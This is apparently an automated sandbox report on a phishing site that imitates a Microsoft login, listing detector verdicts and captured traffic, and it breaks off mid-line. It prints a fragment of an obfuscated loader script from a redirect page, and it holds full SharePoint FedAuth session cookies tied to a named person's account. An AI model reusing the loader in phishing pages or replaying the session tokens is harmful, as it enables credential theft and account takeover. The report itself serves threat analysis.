Click to jump to signature section
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'filex.securecourtcloud.com' does not match the legitimate domain 'microsoft.com'., The domain 'securecourtcloud.com' is not associated with Microsoft., The presence of 'filex' and 'securecourtcloud' in the URL suggests a potential phishing attempt as they are not related to Microsoft., The use of a generic term 'secure' in the domain can be misleading and is often used in phishing attempts. DOM: 4.8.pages.csv |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | Joe Sandbox AI: Score: 8 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'filex.securecourtcloud.com' does not match the legitimate domain 'microsoft.com'., The domain 'securecourtcloud.com' does not appear to be associated with Microsoft., The presence of a subdomain 'filex' and the main domain 'securecourtcloud.com' suggests a potential phishing attempt., The URL does not contain any direct reference to Microsoft, which is suspicious given the brand association. DOM: 4.9.pages.csv |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: Number of links: 0 |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: Total embedded image size: 123322 |
Source: https://pub-d718e5e3afe742b8ab446f7a542f5139.r2.dev/copy.html | HTTP Parser: Base64 decoded: body, html { height: 100%; margin: 0; display: flex; align-items: center; justify-content: center; } @keyframes bounce { 0%, 100%, 12.5%, 32.5%, 76.1% { transform: translateY(0); } 22.5%, 86% { transform: translateY(7px); } } #vaguely { height: 179px; wid... |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: Title: Sharing Link Validation does not match URL |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: Invalid link: Privacy & Cookies |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: Invalid link: Privacy & Cookies |
Source: https://qknaptqvepscqlukrsfs.mmicensacaviar.org.uk/redirect.php?unlouken-carbazylic | HTTP Parser: var devilling= document.createelement("script");devilling.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(devilling);devilling.onload=()=>{var {a,b,c,d} = json.parse(atob("eyjhijoic2c2mw10eulurg9osetbmxnyywriyklsmmvkumzrsvbuuexezk5jumlsvdhak3dledjiz3pucvnpntjzc24ynnp1vfezmfdrzxf6r2y5tejcl2e2qjbprxrbqxfqm2xkdfrru0zir1dtu3fjnknkc05qa1nyajvyng9ibk5rvtlrwnmzy011clmxmjr3sxg0s2hcl3nrcvl0zdzmejfizdrwuud4uw52wurxwm5yvmnkmgu1wkfnb3bfsitxczjgtdazzu1scgfbr01cl0myznh1am5hohnlzdjweuzmvxvys2dpwgjqsis4dvrqy3puwupvsjl5uw9gtvzwmulrdhfodxhxczz3beo3thnwtm5yv29pcnfqnxb0bdvid3lgt1jumhzpceoyulz3akv5ejfzbtb5tu8yn3zkau1lr2nmv0rjslwvc0swuhrjrxvnu2zxotlttkkxylvezjnnmzrclzndzlvnslzlohf5dmn5cnaytkf4vhhpamf5vjrcl2ixymzku2lurflroedfazf5n0vvnvftbtdotwllzwpzqm0zothsd0fot2f1sxjqm1hnmzvoslnvvkxguhkyufvjr1plu0szq0leuu9zbmk5wuhkqnviwvlwu0y0tuhzyvzbmvbwaldqdkz1t2frekv6rlmwykplbwpknhhzwkv0rgjda1d0ngg3bfwvaktrvvq5bzlurgphdxviyulftut5mnzfvkwwbgq2dw5crgk3wmnad3puderbzwq4vgd5c... |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: <input type="password" .../> found |
Source: https://pub-d718e5e3afe742b8ab446f7a542f5139.r2.dev/copy.html | HTTP Parser: No favicon |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No favicon |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No favicon |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No favicon |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No favicon |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No <meta name="author".. found |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No <meta name="author".. found |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No <meta name="copyright".. found |
Source: https://filex.securecourtcloud.com/Fdr9j/?e= | HTTP Parser: No <meta name="copyright".. found |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries | Jump to behavior |
Source: global traffic | TCP traffic: 192.168.2.16:51583 -> 162.159.36.2:53 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.189.173.10 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.22 |
Source: unknown | TCP traffic detected without corresponding DNS query: 192.229.221.95 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.22 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.22 |
Source: unknown | TCP traffic detected without corresponding DNS query: 20.190.160.22 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | HTTP traffic detected: GET /personal/mariejoelle_tremblay_kina8at_ca/_layouts/15/guestaccess.aspx?share=ErWnJRn_SWBKkEcx4yGorhMBtA4m6tEq5cYuHnwwp_z1Sw HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /personal/mariejoelle_tremblay_kina8at_ca/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fmariejoelle%5Ftremblay%5Fkina8at%5Fca%2FDocuments%2FPerso%2FOrganisme%20Kina8a&ga=1 HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSxXMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjBqUjlxRnN4bFM3cUM3TnNNNWtOajc4MU1kU3k1WHpFMDB5ajFTZnAwQjZEK2JkTlUzR1JKdTRFMmRUanJhMlIza3pQa2J6bHhweGZUbG1taEVKVkE1SlloSnR0MURqNUFyRFVLczRsV1puaXpiNVNseGwvbEhQOGh1d2V5OGlXWlNMS1lrRVF1YzYyZGpnOHhzek5yR0tYZlcwdFlOelVXRCtacVRCL3ZFaUFvYXFoSWZYbXVlaXV2aXFXVjJJYmxjVThoUmdiRS9ObTVIUEF3K2FmdDRsSHFnaVJtU1dYczlCOWJpaWJDclpQZHV5aE5SM1ArOC9ndUFzWFkzOE1NdWtmQ0lDd1BQWFE9PTwvU1A+ |
Source: global traffic | HTTP traffic detected: GET /_layouts/15/spwebworkerproxy.ashx HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSxXMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjBqUjlxRnN4bFM3cUM3TnNNNWtOajc4MU1kU3k1WHpFMDB5ajFTZnAwQjZEK2JkTlUzR1JKdTRFMmRUanJhMlIza3pQa2J6bHhweGZUbG1taEVKVkE1SlloSnR0MURqNUFyRFVLczRsV1puaXpiNVNseGwvbEhQOGh1d2V5OGlXWlNMS1lrRVF1YzYyZGpnOHhzek5yR0tYZlcwdFlOelVXRCtacVRCL3ZFaUFvYXFoSWZYbXVlaXV2aXFXVjJJYmxjVThoUmdiRS9ObTVIUEF3K2FmdDRsSHFnaVJtU1dYczlCOWJpaWJDclpQZHV5aE5SM1ArOC9ndUFzWFkzOE1NdWtmQ0lDd1BQWFE9PTwvU1A+ |
Source: global traffic | HTTP traffic detected: GET /_layouts/15/spwebworkerproxy.ashx HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSxXMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjBqUjlxRnN4bFM3cUM3TnNNNWtOajc4MU1kU3k1WHpFMDB5ajFTZnAwQjZEK2JkTlUzR1JKdTRFMmRUanJhMlIza3pQa2J6bHhweGZUbG1taEVKVkE1SlloSnR0MURqNUFyRFVLczRsV1puaXpiNVNseGwvbEhQOGh1d2V5OGlXWlNMS1lrRVF1YzYyZGpnOHhzek5yR0tYZlcwdFlOelVXRCtacVRCL3ZFaUFvYXFoSWZYbXVlaXV2aXFXVjJJYmxjVThoUmdiRS9ObTVIUEF3K2FmdDRsSHFnaVJtU1dYczlCOWJpaWJDclpQZHV5aE5SM1ArOC9ndUFzWFkzOE1NdWtmQ0lDd1BQWFE9PTwvU1A+ |
Source: global traffic | HTTP traffic detected: GET /personal/mariejoelle_tremblay_kina8at_ca/_api/v2.1/graphql HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSxXMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjBqUjlxRnN4bFM3cUM3TnNNNWtOajc4MU1kU3k1WHpFMDB5ajFTZnAwQjZEK2JkTlUzR1JKdTRFMmRUanJhMlIza3pQa2J6bHhweGZUbG1taEVKVkE1SlloSnR0MURqNUFyRFVLczRsV1puaXpiNVNseGwvbEhQOGh1d2V5OGlXWlNMS1lrRVF1YzYyZGpnOHhzek5yR0tYZlcwdFlOelVXRCtacVRCL3ZFaUFvYXFoSWZYbXVlaXV2aXFXVjJJYmxjVThoUmdiRS9ObTVIUEF3K2FmdDRsSHFnaVJtU1dYczlCOWJpaWJDclpQZHV5aE5SM1ArOC9ndUFzWFkzOE1NdWtmQ0lDd1BQWFE9PTwvU1A+ |
Source: global traffic | HTTP traffic detected: GET /personal/mariejoelle_tremblay_kina8at_ca/_api/web/GetListUsingPath(DecodedUrl=@a1)/RenderListDataAsStream?@a1=%27%2Fpersonal%2Fmariejoelle%5Ftremblay%5Fkina8at%5Fca%2FDocuments%27&RootFolder=%2Fpersonal%2Fmariejoelle%5Ftremblay%5Fkina8at%5Fca%2FDocuments%2FPerso%2FOrganisme%20Kina8a&TryNewExperienceSingle=TRUE HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSxXMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjBqUjlxRnN4bFM3cUM3TnNNNWtOajc4MU1kU3k1WHpFMDB5ajFTZnAwQjZEK2JkTlUzR1JKdTRFMmRUanJhMlIza3pQa2J6bHhweGZUbG1taEVKVkE1SlloSnR0MURqNUFyRFVLczRsV1puaXpiNVNseGwvbEhQOGh1d2V5OGlXWlNMS1lrRVF1YzYyZGpnOHhzek5yR0tYZlcwdFlOelVXRCtacVRCL3ZFaUFvYXFoSWZYbXVlaXV2aXFXVjJJYmxjVThoUmdiRS9ObTVIUEF3K2FmdDRsSHFnaVJtU1dYczlCOWJpaWJDclpQZHV5aE5SM1ArOC9ndUFzWFkzOE1NdWtmQ0lDd1BQWFE9PTwvU1A+; FeatureOverrides_experiments=[] |
Source: global traffic | HTTP traffic detected: GET /personal/mariejoelle_tremblay_kina8at_ca/_layouts/15/serviceworkerproxy.aspx?serviceWorkerUrl=https%3A%2F%2Fres-1.cdn.office.net%2Ffiles%2Fodsp-web-prod_2024-11-29.005%2Fodspwebworkers%2Fen-us%2Fspartanlistpostpltworker.js HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://organismekina8at-my.sharepoint.com/personal/mariejoelle_tremblay_kina8at_ca/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fmariejoelle%5Ftremblay%5Fkina8at%5Fca%2FDocuments%2FPerso%2FOrganisme%20Kina8a&ga=1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSxXMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjBqUjlxRnN4bFM3cUM3TnNNNWtOajc4MU1kU3k1WHpFMDB5ajFTZnAwQjZEK2JkTlUzR1JKdTRFMmRUanJhMlIza3pQa2J6bHhweGZUbG1taEVKVkE1SlloSnR0MURqNUFyRFVLczRsV1puaXpiNVNseGwvbEhQOGh1d2V5OGlXWlNMS1lrRVF1YzYyZGpnOHhzek5yR0tYZlcwdFlOelVXRCtacVRCL3ZFaUFvYXFoSWZYbXVlaXV2aXFXVjJJYmxjVThoUmdiRS9ObTVIUEF3K2FmdDRsSHFnaVJtU1dYczlCOWJpaWJDclpQZHV5aE5SM1ArOC9ndUFzWFkzOE1NdWtmQ0lDd1BQWFE9PTwvU1A+; FeatureOverrides_experiments=[] |
Source: global traffic | HTTP traffic detected: GET /personal/mariejoelle_tremblay_kina8at_ca/_layouts/15/serviceworkerproxy.aspx?serviceWorkerUrl=https%3A%2F%2Fres-1.cdn.office.net%2Ffiles%2Fodsp-web-prod_2024-11-29.005%2Fodspwebworkers%2Fen-us%2Fspartanlistpostpltworker.js HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSx